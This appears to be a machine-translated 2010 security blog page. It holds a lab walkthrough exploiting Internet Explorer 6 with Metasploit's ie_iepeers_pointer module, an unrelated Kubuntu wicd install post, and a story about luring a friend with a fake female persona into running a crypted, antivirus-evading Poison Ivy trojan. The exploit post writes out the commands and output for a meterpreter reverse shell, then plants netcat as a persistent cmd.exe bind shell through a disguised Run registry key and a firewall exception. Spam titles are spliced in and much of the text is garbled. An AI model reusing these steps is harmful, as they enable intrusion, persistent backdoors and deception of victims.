Monday, March 22, 2010

Paublina Fotos Bikine

Laboratory - Metasploit - Exploit ie_iepeers_pointer Backdor

March 10 I get an email from one a day, reporting the new 0-day
of Internet Explorer, which targets 6 and 7 versions, versions 5 and 8 are not affected. As a countermeasure would be those who use IE to migrate fully to the version 8. Statistically, approximately 100 people. 20 would be using versions 6 and 7 of IE, I leave a picture


The BOF is an exploit that attacks
ie_iepeers
library can execute arbitrary code with privileges of the user as the executing browser. order to use it from the metasploit before do a update to freamwork.
# msfupdate


Starting


This post is in two parts first the attack to exploit
ie_iepeers,
and then upload netcat and leave it as persistent backdor the victim.

Tools

as a laboratory and I have a Debian 5.0 host system, Windows XP SP 3 - Internet Explorer 6.0 running as a host system, VirtualBox 3.1.4 r57640, Metasploit Framework Version: 3.3.4-de


First Party


Well the data load is exactly like the form where shown in the post Metasploit previous

LINK, show you all together since the election of the exploit, setpoints of variables to launch the exploit.

Enlace Great: / home / magnus # msfconsole
_ \ msf exploit( ie_iepeers_pointer ) >
set SRVHOST 192.168.56.1

SRVHOST => 192.168.56.1
msf exploit(
ie_iepeers_pointer ) > set URIPATH /
URIPATH => /
msf exploit(
ie_iepeers_pointer ) > show options


Module options: Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.56.1 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.56.1 yes The local address
LPORT 4444 yes The local port Exploit target:
Id Name -- ----
0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
msf exploit ( ie_iepeers_pointer )>

exploit [*] Exploit running as background
job.
msf exploit (ie_iepeers_pointer)>
[*] Started
reverse handler on 192.168.56.1:4444

[*] Using URL 
: http://192.168.56.1:8080/ 
 
 [*] Server started 
. 
   see that the attacker has the ip 192.168.56.1, now would stay the victime http://192.168.56.1:8080 enter the address, which is made by the malicious page metasploit, where if you meet the requirements of the exploit will execute the payload on the victim machine. 
  then proceeds  
   
   
   
 The Metasploit console can see how they run and have a session meterpreter.   
 
 
 
 msf exploit (ie_iepeers_pointer)> 
 
 [*] Started 
 reverse handler on 192.168.56.1:4444 
 
 [*] Using URL 
: http://192.168.56.1:8080/ 
  [* ]  Server started. 
  [*] Sending Internet Explorer  iepeers.dll Use After Free to 192.168.56.101:1034 ... 
 
 [*] Sending  stage (748,032 bytes)   [*]  Meterpreter session 1 OPEN (192.168.56.1:4444 -> 192.168.56.101:1035)  
  
 [*]   Session ID 1 (192.168.56.1:4444 -> 192.168.56.101:1035) processing InitialAutoRunScript 'migrate -f'    [*]   Current server process: iexplore.exe (1364) 
  
 [*]   Spawning a notepad.exe host process...    [*]   Migrating into process ID 188 
  
 [*]   New server process: notepad.exe (188)    msf exploit(  ie_iepeers_pointer 
 ) > sessions -l 
  
 Active sessions 
 =============== 
  
 Id  Type         Information                                  Connection 
 --  ----         -----------                                ---------- 
 meterpreter VICTIM-55919B2 1 \\ 2 @ VICTIM victim-55919B2 192.168.56.1:4444 -> 192.168.56.101:1035 
 
 msf exploit (ie_iepeers_pointer)> sessions-i 1 
 [* ] Starting interaction with 1 ... 
 
 meterpreter> sysinfo 
 
 
 Computer: VICTIM-55919B2 
 OS: Windows XP (Build 2600, Service Pack 3). 
 Arch: x86 
 Language: en_US 
 meterpreter> 
 
 
 
 
 
 
 
 Part 
    After obtaining a session what we do is interact with the victim with meterpreter. This process is very simple backdor consist of raising the leaving netcat in listening to a port with a cmd.exe, and placing an exception in the firewall because the connection type will bind.  
  Raising the netcat  
 For this we need to have netcat for windows, I have it in my folder / home / and we will post it in the system32 folder, the sentence also would look like. 
   
   
   meterpreter> 
 upload / home / magnus / nc.exe c: \\ windows \\ \\ system32

[*]
uploading: / home / magnus / nc.exe -> c: \\ windows \\ system32

[*]
uploaded: / home / magnus / nc.exe -> c: \\ windows \\ system32 \\ nc.exe Then
add a registry key to boot windows netcat listening on port 1234 with the cmd.exe, so
-d daemon
.



meterpreter> reg setval 
-k HKLM \\ \\ Software \\ Microsoft \\ \\ Windows \\ \\ CurrentVersion \\ \\ Run 
-v realtek-d "C: \\ Windows \\ System32 \\ nc.exe-L-d -e cmd.exe-p 1234 'Successful 
  Hacked September.  
   quedaria Now we add an exception in windows firewall, the victim, for it pedismos metrpreter a shell and execute the commands as shown. 
   
   meterpreter> 
 execute cmd.exe-i-f-H   Process 560 created. 
 Channel 3 created.  Microsoft Windows XP [Versin 01/05/2600]  (C) Copyright 1985-2001 Microsoft Corp.. 
  C: \\ Documents and Settings \\ victima 2 \\ Escritorio> netsh firewall add portopening ALL 1234 "c: \\ windows \\ system32 \\ nc.exe"  ALL netsh firewall add portopening 1234 "c: \\ windows \\ system32 \\ nc.exe" OK 
   
 C: \\ Documents and Settings \\ victim 2 \\ Desktop> netsh firewall show portopening  netsh firewall show portopening  
 Settings port for the standard profile: Port Protocol Mode Name   ----------------------------------- Enable TCP 
 1234 -------------------------------- c: \\ windows \\ system32 \\ nc.exe  1234 UDP Enable c: \\ windows \\ system32 \\ nc.exe  
 
 C: \\ Documents and Settings \\ victim 2 \\ Desktop> ^ C Terminate  channel 3? [Y / N] and  meterpreter> reboot 
 Rebooting ... 
 
 
 
 
 netsh command allows him to set us 
 windows firewall settings, what we do is to add an exception for the program netcat on port 1234 for UDP and TCP, and as an example then we can see that are placing 
 exeption with the command netsh firewall show portopening 
 
 gritted Crtl + c, does not give the meterpreter and reboot the computer of the victim. Now 
 Notice how the victim is listening on port 1234 
   
 
 
 
 
 
 
 we can only verify and enter the netcat to the victim of this form.







That's all Greetings
Posted by admin at 11:43 AM 0 comments

Tuesday, March 16, 2010

Stunt Driver Ramp 10 Degrees

Persistent + Kubuntu + wicd + PRO / Wireless 3945ABG Intel





Well today I was installing
Kubuntu 9.10 on my notebook
without
no problem so far you can connect to the wireless
, is that by default
brought me
Network 
 
 -  Manager as administrator 
  
 
 Network connection, and to verify the existence of a network not looked

. My wifi network card


is a model
INTEL PRO / Wireless 
 ABG 
  3945, now the problem was that the cable plate I go, making no ip  
 then my only 
 
 
 
 solution is always the wifi 
 
. 
 A friend told me that he used the wicd 
 
 
 
, 
 
 so I decided 
 
 download, the issue was that I had no internet 
 
 then I had problems with dependencies 
 
, I had to go to $ W and download the dependencies 
 
 often return. 
 He who has a problem similar
perhaps this can help, I'll put the list of packages to download
tube for the wicd me
work correctly and is running in kubuntu

:). Steps


download the wicd
format.

deb for ubuntu

from


Before installing you have to uninstall

the Network
-
Manager
#
aptitude remove network

- Mmanager The following dependencies me threw me. wicd depends python - gtk 2, but: Package python - gtk 2 'is not installed. wicd depends on python - glade 2, but: Package python -
glade 2 'is not installed. wicd depends on python - urwid , however: Package python - urwid
is not installed. Beginning to look one by one I found to some problems as a package always depends on another and so , and had to restart the pc
to go to W $ to search for new packages, as well
let you realize the steps
until the end
    wicd running smoothly on Kubuntu
  • . # dpkg-i python-cairo_1.8.6-1ubuntu1_i386.deb #
    • dpkg-i python-gtk2_2.14.1-1ubuntu1_i386.deb

    #
  • dpkg-i libglade2-0_2.6.4-1_i386.deb
    • #
dpkg-i python-glade2_2.14.1-1ubuntu1_i386.deb # dpkg-i python- urwid_0.9.8. 4-1_i386.deb And finally install Wicd

the same way with dpkg
# dpkg-i
wicd_1.6.2.2-1_all.deb
That packet sequence was that I turned, can find here most other packages may have to googling for a while. LINK Greetings
Posted by admin at 1:17 PM 0 comments

Sunday, March 7, 2010

Remove Formaldehyde Smell

Danger Social Engineering


Well after a while without posting back with this interesting temita , and is very broad, which is
Social Engineering.
This attack is as powerful as a 0 day, but look a little to what we do not know what it is and for those who can show a real case.
    The main point of this post is not only report if not alarming and that after this not so sure of having a date with all the AV signatures to date, prevented because the Internet you do not know who it is that is on the other side of the PC:).
  • In my view "What is Engineering
So cial?
Social engineering is a technique which is able to trick a person pretending to be: a trusted person of the victim, a person whom you would like to know, an attractive person, a person important to the victim posing as the victim etc etc etc ... in order to enter in their area of \u200b\u200bconfidence and remove confidential information such as passwords, documents, files, etc.
Starting
I think one of the easiest ways to trick a man posing as a mine that good, very good: p. The steps are easy you get photos of a girl in particular, a facebook and email. This is the art of deception so to imagine.! Now we can prepare something like a good trojan (in this example, Poison Ivy) crypter gone through to make it undetectable, the following pictures show the before and after Crypter ..


    Before



After






now seen as a Trojan as known is not detectable by any AV, PC now to imagine the insurance must be with AV, it is another tool that has to fit the entire security process, but salvation is not secure.
Fijense the degree of danger, not just a matter of seeing the green letters, if not above that we are not having knowledge of these things, and this is just the tip of the iceberg.!
Now as our victim could not winning with his genius began to fall in the histeriqueo own a teenage girl! (It is worth mentioning that the victim was a friend Oh, and he never knew about all the work we had back, obviously after I told him that was me eh.! I almost lose their friendship! NAAA .. ha!). Let the conversation
I think the picture says it all, good access to the machine through a Trojan, but the danger that this leads to theft of your accounts, your files, steal as much important PRIVACY PRIVACY talking about what is not ours My girlfriend, wife etc.
do not expect as I said earlier that this paper is a form only to report if not also to alert and bring some knowledge with you, that anyone can happen to us that, among other things ..!


Finally let the 4 items which, according to Kevin Mitnick
Social engineering is successful the

1. We all want to help. 2. The first movement is always trusted the other. 3. We like to say No. 4. We all like to be praised. Greetings
Posted by admin at 7:19 PM 0 comments
Subscribe to: Comments (Atom)